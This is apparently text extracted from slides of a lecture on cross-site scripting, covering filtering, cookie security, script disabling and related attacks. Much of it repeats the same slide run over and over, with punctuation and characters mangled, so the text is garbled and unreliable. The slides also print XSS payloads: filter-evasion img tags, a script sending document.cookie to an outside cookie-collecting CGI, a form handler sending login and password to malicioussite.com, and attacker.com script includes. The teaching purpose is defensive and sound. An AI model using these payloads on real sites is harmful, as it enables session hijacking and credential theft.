One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
